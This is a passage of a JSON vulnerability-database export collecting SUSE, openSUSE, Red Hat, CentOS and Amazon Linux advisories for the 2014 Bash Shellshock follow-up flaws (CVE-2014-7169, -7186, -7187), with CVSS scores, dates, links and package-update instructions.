href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a>>\n * CVE-2014-7186\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186</a>>\n * CVE-2014-7187\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187</a>>\n\n", "edition": 1, "modified": "2014-09-28T19:05:16", "published": "2014-09-28T19:05:16", "id": "SUSE-SU-2014:1247-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html", "type": "suse", "title": "Security update for bash (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "bash was updated to fix command injection via environment variables.\n (CVE-2014-6271,CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\n\n", "edition": 1, "modified": "2014-09-29T14:04:19", "published": "2014-09-29T14:04:19", "id": "OPENSUSE-SU-2014:1254-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html", "title": "bash (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:44", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "edition": 1, "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n Security Issues:\n\n * CVE-2014-7169\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a>>\n * CVE-2014-7186\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186</a>>\n * CVE-2014-7187\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187</a>>\n\n", "modified": "2014-09-29T21:04:16", "published": "2014-09-29T21:04:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00046.html", "id": "SUSE-SU-2014:1247-2", "title": "Security update for bash (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionaly two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n", "edition": 1, "modified": "2014-09-28T12:10:05", "published": "2014-09-28T12:10:05", "id": "OPENSUSE-SU-2014:1242-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00041.html", "type": "suse", "title": "bash (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:08:03", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionaly two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n", "edition": 1, "modified": "2014-09-30T17:05:22", "published": "2014-09-30T17:05:22", "id": "SUSE-SU-2014:1259-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00048.html", "type": "suse", "title": "bash (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "edition": 1, "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionaly two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n", "modified": "2014-09-28T12:05:59", "published": "2014-09-28T12:05:59", "id": "OPENSUSE-SU-2014:1229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00038.html", "title": "bash (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-12-11T13:31:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:18:56", "published": "2014-09-26T04:00:00", "id": "RHSA-2014:1311", "href": "https://access.redhat.com/errata/RHSA-2014:1311", "type": "redhat", "title": "(RHSA-2014:1311) Important: bash security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nShift_JIS, also known as \"SJIS\", is a character encoding for the Japanese\nlanguage. This package provides bash support for the Shift_JIS encoding.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll users who require Shift_JIS encoding support with Bash built-in\nfunctions are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\n", "modified": "2018-06-13T01:27:56", "published": "2014-09-26T04:00:00", "id": "RHSA-2014:1312", "href": "https://access.redhat.com/errata/RHSA-2014:1312", "type": "redhat", "title": "(RHSA-2014:1312) Important: bash Shift_JIS security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:16", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nShift_JIS, also known as \"SJIS\", is a character encoding for the Japanese\nlanguage. This package provides bash support for the Shift_JIS encoding.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll users who require Shift_JIS encoding support with Bash built-in\nfunctions are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\n", "modified": "2017-09-08T12:18:14", "published": "2014-11-17T05:00:00", "id": "RHSA-2014:1865", "href": "https://access.redhat.com/errata/RHSA-2014:1865", "type": "redhat", "title": "(RHSA-2014:1865) Important: bash Shift_JIS security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:35", "published": "2014-09-26T04:00:00", "id": "RHSA-2014:1306", "href": "https://access.redhat.com/errata/RHSA-2014:1306", "type": "redhat", "title": "(RHSA-2014:1306) Important: bash security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:32", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1568", "CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain services\nand applications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue. (CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)\ninput from certain RSA signatures. A remote attacker could use this flaw to\nforge RSA certificates by providing a specially crafted signature to an\napplication using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and possibly\nleading to arbitrary code execution when evaluating untrusted input that\nwould not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,\nand the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges\nAntoine Delignat-Lavaud and Intel Product Security Incident Response Team\nas the original reporters of CVE-2014-1568. The CVE-2014-7186 and\nCVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product\nSecurity.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package.\n", "modified": "2018-06-07T09:00:23", "published": "2014-10-02T04:00:00", "id": "RHSA-2014:1354", "href": "https://access.redhat.com/errata/RHSA-2014:1354", "type": "redhat", "title": "(RHSA-2014:1354) Critical: rhev-hypervisor6 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:35:27", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "**CentOS Errata and Security Advisory** CESA-2014:1306\n\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/032629.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/032630.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/032631.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/044965.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/045022.html\n\n**Affected packages:**\nbash\nbash-doc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1306.html", "edition": 6, "modified": "2014-09-30T11:23:09", "published": "2014-09-26T02:16:02", "href": "http://lists.centos.org/pipermail/centos-announce/2014-September/032629.html", "id": "CESA-2014:1306", "title": "bash security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "**Issue Overview:**\n\nGNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nNOTE: this vulnerability exists because of an incomplete fix for [CVE-2014-6271 __](<https://access.redhat.com/security/cve/CVE-2014-6271>) and this bulletin is a follow-up to [ALAS-2014-418](<https://alas.aws.amazon.com/ALAS-2014-418.html>).\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. \n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. \n\n \n\n\n#### Special notes:\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with new bash packages that also fix both [CVE-2014-7169 __](<https://access.redhat.com/security/cve/CVE-2014-7169>) and [CVE-2014-6271 __](<https://access.redhat.com/security/cve/CVE-2014-6271>).\n\nFor 2014.09 Amazon Linux AMIs, _bash-4.1.2-15.21.amzn1_ addresses both CVEs. Running _yum clean all_ followed by _yum update bash_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2014.03 repositories, _bash-4.1.2-15.21.amzn1_ also addresses both CVEs. Running _yum clean all_ followed by _yum update bash_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.09 or 2013.03 repositories, _bash-4.1.2-15.18.22.amzn1_ addresses both CVEs. Running _yum clean all_ followed by _yum update bash_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2012.09, 2012.03, or 2011.09 repositories, run _yum clean all_ followed by _yum --releasever=2013.03 update bash_ to install only the updated bash package.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nbash\n\n \n**Issue Correction:** \nRun _yum update bash_ to update your system. Note that you may need to run _yum clean all_ first.\n\n \n\n\n**New Packages:**\n \n \n i686: \n bash-debuginfo-4.1.2-15.21.amzn1.i686 \n bash-doc-4.1.2-15.21.amzn1.i686 \n bash-4.1.2-15.21.amzn1.i686 \n \n src: \n bash-4.1.2-15.21.amzn1.src \n \n x86_64: \n bash-doc-4.1.2-15.21.amzn1.x86_64 \n bash-debuginfo-4.1.2-15.21.amzn1.x86_64 \n bash-4.1.2-15.21.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-09-24T22:26:00", "published": "2014-09-24T22:26:00", "id": "ALAS-2014-419", "href": "https://alas.aws.amazon.com/ALAS-2014-419.html", "title": "Important: bash", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}